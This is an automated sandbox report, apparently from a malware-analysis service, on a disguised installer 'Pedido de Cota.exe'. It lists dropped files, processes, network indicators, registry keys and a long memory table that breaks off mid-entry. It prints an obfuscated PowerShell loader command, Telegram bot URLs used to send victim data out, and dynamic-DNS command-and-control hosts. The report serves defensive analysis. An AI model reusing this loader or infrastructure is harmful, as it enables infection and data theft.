IOC Report
Pedido de Cota

loading gifFilesProcessesURLsDomainsIPsRegistryMemdumps321010010Label

Files

File Path
Type
Category
Malicious
Download
Pedido de Cota.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\tilkendelsens\disappearances\josts\Unvoraciously\Pedido de Cota.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\tilkendelsens\disappearances\josts\Unvoraciously\Pedido de Cota.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wdrcmqf.asj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htqrdndh.her.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rurju4tp.hxi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjqr0qbi.y2e.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\tilkendelsens\disappearances\josts\Alvers.txt
Generic INItialization configuration [dispassionateness tilfrslen]
dropped
C:\Users\user\AppData\Local\tilkendelsens\disappearances\josts\Unvoraciously\borrises.sub
data
dropped
C:\Users\user\AppData\Local\tilkendelsens\disappearances\josts\Unvoraciously\gallinulinae.vou
GTA audio index data (SDT)
dropped
C:\Users\user\AppData\Local\tilkendelsens\disappearances\josts\Unvoraciously\hgwells.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\tilkendelsens\disappearances\josts\Unvoraciously\sprogtonerne.dag
GTA audio index data (SDT)
dropped
C:\Users\user\AppData\Local\tilkendelsens\disappearances\josts\Uricacidemia.Ove
data
dropped
C:\Users\user\AppData\Local\tilkendelsens\disappearances\josts\kvantumsrabatters.Ska
Unicode text, UTF-8 text, with very long lines (3419), with CRLF, LF line terminators
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Pedido de Cota.exe
"C:\Users\user\Desktop\Pedido de Cota.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle 1 "$Solfyldte=GC -raw 'C:\Users\user\AppData\Local\tilkendelsens\disappearances\josts\kvantumsrabatters.Ska';$svrtes=$Solfyldte.SubString(54659,3);.$svrtes($Solfyldte)"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://duckduckgo.com/ac/?q=
unknown
https://www.office.com/T
unknown
https://api.telegram.org
unknown
https://api.telegram.org/bot
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20a
unknown
http://crl.microsoft
unknown
https://contoso.com/License
unknown
https://www.office.com/lB
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://drive.usercontent.google.com/BY
unknown
https://chrome.google.com/webstore?hl=en
unknown
http://varders.kozow.com:8081
unknown
https://www.google.com
unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico
unknown
http://checkip.dyndns.org/
132.226.8.169
https://aka.ms/pscore6lB
unknown
https://drive.google.com/
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://reallyfreegeoip.org/xml/45.92.229.138
104.21.16.1
https://apis.google.com
unknown
https://chrome.google.com/webstore?hl=enT
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://reallyfreegeoip.org/xml/
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://drive.usercontent.google.com/MY
unknown
https://duckduckgo.com/chrome_newtabv20-
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2028/03/2025%20/%2021:29:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://ac.ecosia.org?q=
unknown
http://checkip.dyndns.org
unknown
https://reallyfreegeoip.org/xml/45.92.229.138$
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://github.com/Pester/Pester
unknown
http://aborters.duckdns.org:8081
unknown
https://www.ecosia.org/newtab/v20
unknown
http://anotherarmy.dns.army:8081
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://reallyfreegeoip.org
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://gemini.google.com/app?q=
unknown
There are 39 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.251.40.238
drive.usercontent.google.com
142.250.64.97
reallyfreegeoip.org
104.21.16.1
api.telegram.org
149.154.167.220
checkip.dyndns.com
132.226.8.169
checkip.dyndns.org
unknown

IPs

IP
Domain
Country
Malicious
142.250.64.97
drive.usercontent.google.com
United States
132.226.8.169
checkip.dyndns.com
United States
149.154.167.220
api.telegram.org
United Kingdom
104.21.16.1
reallyfreegeoip.org
United States
142.251.40.238
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
9903000
direct allocation
page execute and read and write
malicious
21CC1000
trusted library allocation
page read and write
malicious
762000
heap
page read and write
2E70000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page execute and read and write
7B00000
direct allocation
page read and write
2E20000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
24B20000
trusted library allocation
page read and write
7BDB000
stack
page read and write
21D7B000
trusted library allocation
page read and write
24010000
trusted library allocation
page execute and read and write
24500000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
21D6B000
trusted library allocation
page read and write
8640000
trusted library allocation
page read and write
778000
heap
page read and write
21E4E000
trusted library allocation
page read and write
873E000
stack
page read and write
24500000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
570000
heap
page read and write
23DA0000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
23DE0000
trusted library allocation
page read and write
7B70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
75B000
heap
page read and write
24520000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
24BB0000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
21D18000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
23E40000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
21E6C000
trusted library allocation
page read and write
2E6D000
stack
page read and write
7910000
trusted library allocation
page read and write
883E000
stack
page read and write
24520000
trusted library allocation
page read and write
21E3A000
trusted library allocation
page read and write
24BD0000
trusted library allocation
page read and write
23E60000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
44A000
unkown
page read and write
24500000
trusted library allocation
page read and write
24B80000
trusted library allocation
page read and write
23ED2000
heap
page read and write
2E70000
trusted library allocation
page read and write
21B60000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
21B92000
trusted library allocation
page read and write
24BC0000
trusted library allocation
page read and write
762000
heap
page read and write
24520000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
5DC9000
trusted library allocation
page read and write
27BF000
stack
page read and write
23F55000
heap
page read and write
24520000
trusted library allocation
page read and write
2E30000
trusted library allocation
page read and write
24BD0000
trusted library allocation
page read and write
24B80000
trusted library allocation
page read and write
50AB000
stack
page read and write
6314000
heap
page read and write
23E40000
trusted library allocation
page read and write
8B00000
trusted library allocation
page execute and read and write
3130000
direct allocation
page read and write
21B7D000
trusted library allocation
page execute and read and write
24520000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
31E3000
trusted library allocation
page execute and read and write
7B00000
trusted library allocation
page read and write
21F57000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
88F0000
heap
page read and write
2E70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
7AD0000
trusted library allocation
page read and write
2199E000
stack
page read and write
24BC0000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
7230000
direct allocation
page read and write
24520000
trusted library allocation
page read and write
24B80000
trusted library allocation
page read and write
24001000
trusted library allocation
page read and write
7A8D000
stack
page read and write
8D90000
trusted library allocation
page read and write
21B70000
trusted library allocation
page read and write
22E43000
trusted library allocation
page read and write
60E0000
heap
page read and write
24BD0000
trusted library allocation
page read and write
3050000
heap
page read and write
8750000
heap
page read and write
327C000
heap
page read and write
74F000
heap
page read and write
2270000
heap
page read and write
21F5E000
trusted library allocation
page read and write
23E40000
trusted library allocation
page read and write
3080000
direct allocation
page read and write
24000000
trusted library allocation
page read and write
22F94000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
23E6A000
trusted library allocation
page read and write
216B0000
heap
page read and write
24500000
trusted library allocation
page read and write
24BD0000
trusted library allocation
page read and write
21B90000
trusted library allocation
page read and write
7970000
trusted library allocation
page read and write
760E000
stack
page read and write
22F88000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
21D6F000
trusted library allocation
page read and write
24BA7000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
24BB0000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
21F64000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
240C1000
heap
page read and write
24520000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
61C0000
direct allocation
page read and write
24000000
trusted library allocation
page read and write
62CC000
heap
page read and write
62D0000
heap
page read and write
4110000
remote allocation
page execute and read and write
3250000
heap
page read and write
2E70000
trusted library allocation
page read and write
4BC0000
heap
page execute and read and write
2E20000
heap
page read and write
89B1000
heap
page read and write
44E000
unkown
page readonly
4B70000
heap
page readonly
79CE000
stack
page read and write
230AB000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E71000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
23D9E000
stack
page read and write
26BF000
stack
page read and write
86F0000
trusted library allocation
page read and write
6230000
direct allocation
page read and write
24520000
trusted library allocation
page read and write
766000
heap
page read and write
21FC7000
trusted library allocation
page read and write
7711000
heap
page read and write
8650000
trusted library allocation
page execute and read and write
764E000
stack
page read and write
24500000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
24BD0000
trusted library allocation
page read and write
30C0000
direct allocation
page read and write
24B80000
trusted library allocation
page read and write
3344000
heap
page read and write
21A00000
remote allocation
page read and write
22005000
trusted library allocation
page read and write
434000
unkown
page read and write
862E000
stack
page read and write
24000000
trusted library allocation
page read and write
789C000
heap
page read and write
24BF0000
trusted library allocation
page execute and read and write
21D2D000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
23FFE000
stack
page read and write
422000
unkown
page read and write
24520000
trusted library allocation
page read and write
21D0B000
trusted library allocation
page read and write
243BE000
stack
page read and write
24BB0000
trusted library allocation
page read and write
4CCF000
heap
page read and write
24520000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
30F0000
direct allocation
page read and write
24520000
trusted library allocation
page read and write
31E4000
trusted library allocation
page read and write
23DAE000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
24BD0000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
7809000
heap
page read and write
2E70000
trusted library allocation
page read and write
22FDF000
trusted library allocation
page read and write
4CA7000
heap
page read and write
2E70000
trusted library allocation
page read and write
8922000
heap
page read and write
24500000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
3066000
heap
page read and write
24500000
trusted library allocation
page read and write
23E60000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
320A000
trusted library allocation
page execute and read and write
24520000
trusted library allocation
page read and write
75B000
heap
page read and write
2E70000
trusted library allocation
page read and write
21A90000
direct allocation
page read and write
7900000
trusted library allocation
page read and write
4C4E000
stack
page read and write
7F920000
trusted library allocation
page execute and read and write
23E80000
heap
page read and write
24B80000
trusted library allocation
page read and write
224E000
stack
page read and write
2E00000
trusted library allocation
page read and write
21C7C000
stack
page read and write
8580000
trusted library allocation
page read and write
4BA0000
trusted library allocation
page execute and read and write
24B00000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
32B7000
heap
page read and write
60E7000
heap
page read and write
21B80000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
7B30000
trusted library allocation
page read and write
75B000
heap
page read and write
2E00000
trusted library allocation
page read and write
22D1F000
trusted library allocation
page read and write
21D77000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
78CF000
heap
page read and write
6336000
heap
page read and write
75B000
heap
page read and write
7B90000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
524F000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
32C0000
heap
page read and write
24B80000
trusted library allocation
page read and write
22F9F000
trusted library allocation
page read and write
62B8000
heap
page read and write
24520000
trusted library allocation
page read and write
23E40000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
98000
stack
page read and write
2E70000
trusted library allocation
page read and write
21F14000
trusted library allocation
page read and write
7AF0000
trusted library allocation
page read and write
21FF7000
trusted library allocation
page read and write
6090000
heap
page readonly
8A9B000
heap
page read and write
3190000
heap
page read and write
2E70000
trusted library allocation
page read and write
23E40000
trusted library allocation
page read and write
24BD0000
trusted library allocation
page read and write
6219000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24B80000
trusted library allocation
page read and write
86D0000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
4C9E000
stack
page read and write
2E70000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
24BB0000
trusted library allocation
page read and write
23EEF000
heap
page read and write
24AE0000
trusted library allocation
page read and write
24BD0000
trusted library allocation
page read and write
78B6000
heap
page read and write
86C0000
trusted library allocation
page read and write
21880000
trusted library allocation
page read and write
21F1E000
trusted library allocation
page read and write
21DA3000
trusted library allocation
page read and write
632C000
heap
page read and write
24520000
trusted library allocation
page read and write
8740000
direct allocation
page execute and read and write
2190F000
stack
page read and write
2E70000
trusted library allocation
page read and write
23DC1000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
6220000
direct allocation
page read and write
2E70000
trusted library allocation
page read and write
24B80000
trusted library allocation
page read and write
22EEC000
trusted library allocation
page read and write
5347000
trusted library allocation
page read and write
512E000
stack
page read and write
24500000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
7B10000
direct allocation
page read and write
502F000
stack
page read and write
24B80000
trusted library allocation
page read and write
89B9000
heap
page read and write
77B000
heap
page read and write
60E5000
heap
page read and write
23E40000
trusted library allocation
page read and write
22E5A000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24B00000
trusted library allocation
page read and write
3200000
trusted library allocation
page read and write
24BC0000
trusted library allocation
page read and write
22CC1000
trusted library allocation
page read and write
88FC000
heap
page read and write
41E3000
remote allocation
page execute and read and write
61F1000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
22F23000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
23DCD000
trusted library allocation
page read and write
21F94000
trusted library allocation
page read and write
23DA6000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
8B20000
trusted library allocation
page read and write
75B000
heap
page read and write
21FFC000
trusted library allocation
page read and write
74F000
heap
page read and write
21EAA000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
5A38000
trusted library allocation
page read and write
23E40000
trusted library allocation
page read and write
23DD2000
trusted library allocation
page read and write
88E0000
heap
page read and write
21F2C000
trusted library allocation
page read and write
6080000
heap
page read and write
21B74000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
22DC9000
trusted library allocation
page read and write
240C1000
heap
page read and write
864D000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
62C2000
heap
page read and write
21D73000
trusted library allocation
page read and write
7660000
heap
page read and write
21F51000
trusted library allocation
page read and write
6CF000
stack
page read and write
8997000
heap
page read and write
E5C000
stack
page read and write
2E70000
trusted library allocation
page read and write
7B80000
direct allocation
page read and write
21F09000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
3220000
heap
page read and write
88E8000
heap
page read and write
766000
heap
page read and write
23DC6000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
24001000
trusted library allocation
page read and write
23E40000
trusted library allocation
page read and write
24BE0000
trusted library allocation
page read and write
AD03000
direct allocation
page execute and read and write
3240000
trusted library allocation
page read and write
2170E000
stack
page read and write
22DE5000
trusted library allocation
page read and write
3070000
direct allocation
page read and write
7B40000
trusted library allocation
page read and write
217E000
stack
page read and write
24520000
trusted library allocation
page read and write
22028000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
24B00000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
22FD4000
trusted library allocation
page read and write
22FBB000
trusted library allocation
page read and write
3060000
heap
page read and write
2E70000
trusted library allocation
page read and write
22FB0000
trusted library allocation
page read and write
8695000
trusted library allocation
page read and write
93CE000
stack
page read and write
244FE000
stack
page read and write
24500000
trusted library allocation
page read and write
23DF0000
trusted library allocation
page read and write
24AE0000
trusted library allocation
page read and write
400000
unkown
page readonly
21C2E000
stack
page read and write
2E00000
trusted library allocation
page read and write
21A00000
remote allocation
page read and write
24520000
trusted library allocation
page read and write
24BB0000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
91F000
stack
page read and write
2E70000
trusted library allocation
page read and write
62BF000
heap
page read and write
21BA7000
trusted library allocation
page execute and read and write
23E00000
trusted library allocation
page read and write
24AF0000
trusted library allocation
page execute and read and write
22DB3000
trusted library allocation
page read and write
2F70000
heap
page read and write
24000000
trusted library allocation
page read and write
24B80000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
2178D000
stack
page read and write
23E40000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
728000
heap
page read and write
31ED000
trusted library allocation
page execute and read and write
23DBE000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2443E000
stack
page read and write
2437E000
stack
page read and write
24520000
trusted library allocation
page read and write
772000
heap
page read and write
22FA5000
trusted library allocation
page read and write
23E70000
heap
page read and write
427000
unkown
page read and write
2E70000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
3289000
heap
page read and write
24520000
trusted library allocation
page read and write
401000
unkown
page execute read
2E00000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
7B10000
trusted library allocation
page read and write
4B2E000
stack
page read and write
7B20000
direct allocation
page read and write
21F4D000
trusted library allocation
page read and write
22D21000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
21FFA000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
5170000
heap
page execute and read and write
2E70000
trusted library allocation
page read and write
4B88000
trusted library allocation
page read and write
8A4F000
heap
page read and write
2110000
heap
page read and write
2433D000
stack
page read and write
A303000
direct allocation
page execute and read and write
24520000
trusted library allocation
page read and write
2135000
heap
page read and write
24520000
trusted library allocation
page read and write
7980000
heap
page execute and read and write
2E70000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
6323000
heap
page read and write
766000
heap
page read and write
61F0000
direct allocation
page read and write
8D80000
trusted library allocation
page execute and read and write
2E10000
trusted library allocation
page read and write
23CC8000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
940D000
stack
page read and write
22F8D000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
772000
heap
page read and write
7F938000
trusted library allocation
page execute and read and write
24B80000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
89C7000
heap
page read and write
2E70000
trusted library allocation
page read and write
22F0B000
trusted library allocation
page read and write
24BC0000
trusted library allocation
page read and write
51E9000
heap
page read and write
86E0000
trusted library allocation
page read and write
23E50000
heap
page execute and read and write
2E70000
trusted library allocation
page read and write
21BA0000
trusted library allocation
page read and write
772000
heap
page read and write
23E3E000
stack
page read and write
22EF0000
trusted library allocation
page read and write
22F9A000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
8A61000
heap
page read and write
24B90000
trusted library allocation
page execute and read and write
21D63000
trusted library allocation
page read and write
24B80000
trusted library allocation
page read and write
21B27000
stack
page read and write
24500000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
50EE000
stack
page read and write
19A000
stack
page read and write
4BB0000
trusted library allocation
page read and write
51F1000
trusted library allocation
page read and write
78D9000
heap
page read and write
7B60000
trusted library allocation
page read and write
21FBF000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
23DA4000
trusted library allocation
page read and write
766000
heap
page read and write
2E70000
trusted library allocation
page read and write
2E16000
trusted library allocation
page read and write
21A7F000
stack
page read and write
8AA7000
heap
page read and write
22D36000
trusted library allocation
page read and write
22CE9000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
86C4000
trusted library allocation
page read and write
23018000
trusted library allocation
page read and write
218CE000
stack
page read and write
762000
heap
page read and write
24520000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
31E0000
trusted library allocation
page read and write
5FE3000
remote allocation
page execute and read and write
B703000
direct allocation
page execute and read and write
6250000
heap
page read and write
77B000
heap
page read and write
21BE000
stack
page read and write
24BC0000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
30D0000
direct allocation
page read and write
24B00000
trusted library allocation
page read and write
490000
heap
page read and write
21F27000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
21E40000
trusted library allocation
page read and write
31F0000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
75B000
heap
page read and write
762000
heap
page read and write
22D4F000
trusted library allocation
page read and write
21BA2000
trusted library allocation
page read and write
24510000
trusted library allocation
page execute and read and write
24520000
trusted library allocation
page read and write
24C20000
trusted library allocation
page read and write
7240000
direct allocation
page read and write
7930000
trusted library allocation
page read and write
20E0000
heap
page read and write
2E70000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
24B80000
trusted library allocation
page read and write
24AE0000
trusted library allocation
page read and write
28C8000
heap
page read and write
23E40000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
580000
heap
page read and write
24BB0000
trusted library allocation
page read and write
51E0000
heap
page read and write
24520000
trusted library allocation
page read and write
74F000
heap
page read and write
24500000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
5CE000
stack
page read and write
766000
heap
page read and write
21AEA000
stack
page read and write
24000000
trusted library allocation
page read and write
8970000
heap
page read and write
23E40000
trusted library allocation
page read and write
24BD0000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
21C30000
heap
page execute and read and write
2E10000
trusted library allocation
page read and write
22EC1000
trusted library allocation
page read and write
21CB0000
heap
page read and write
7A0E000
stack
page read and write
24520000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
629E000
heap
page read and write
772000
heap
page read and write
21F0E000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24B90000
trusted library allocation
page read and write
408000
unkown
page readonly
2E70000
trusted library allocation
page read and write
24BD0000
trusted library allocation
page read and write
21B96000
trusted library allocation
page execute and read and write
24BD0000
trusted library allocation
page read and write
22E12000
trusted library allocation
page read and write
30A0000
direct allocation
page read and write
24520000
trusted library allocation
page read and write
55E3000
remote allocation
page execute and read and write
762000
heap
page read and write
24500000
trusted library allocation
page read and write
64E0000
heap
page read and write
2E70000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
230EC000
trusted library allocation
page read and write
21B40000
heap
page read and write
2E70000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
24510000
trusted library allocation
page read and write
28C0000
heap
page read and write
22F39000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
6240000
direct allocation
page read and write
24C10000
trusted library allocation
page read and write
7440000
heap
page read and write
2E00000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
762000
heap
page read and write
70E000
stack
page read and write
4CCF000
heap
page read and write
9410000
heap
page read and write
400000
unkown
page readonly
24000000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
3210000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
21F30000
trusted library allocation
page read and write
2195D000
stack
page read and write
23E00000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
5A4E000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
21A00000
remote allocation
page read and write
8890000
trusted library allocation
page read and write
28CC000
heap
page read and write
2400D000
trusted library allocation
page read and write
772000
heap
page read and write
21D5B000
trusted library allocation
page read and write
60A0000
heap
page read and write
23DB2000
trusted library allocation
page read and write
74F000
heap
page read and write
2E70000
trusted library allocation
page read and write
75B000
heap
page read and write
23E40000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
21D5F000
trusted library allocation
page read and write
766000
heap
page read and write
432000
unkown
page read and write
2174F000
stack
page read and write
22F33000
trusted library allocation
page read and write
62D3000
heap
page read and write
2184F000
stack
page read and write
21B9A000
trusted library allocation
page execute and read and write
5175000
heap
page execute and read and write
2E10000
trusted library allocation
page read and write
6398000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
21CA0000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
401000
unkown
page execute read
21FC9000
trusted library allocation
page read and write
24510000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
21BA5000
trusted library allocation
page execute and read and write
3258000
heap
page read and write
6389000
trusted library allocation
page read and write
21E7F000
trusted library allocation
page read and write
30B0000
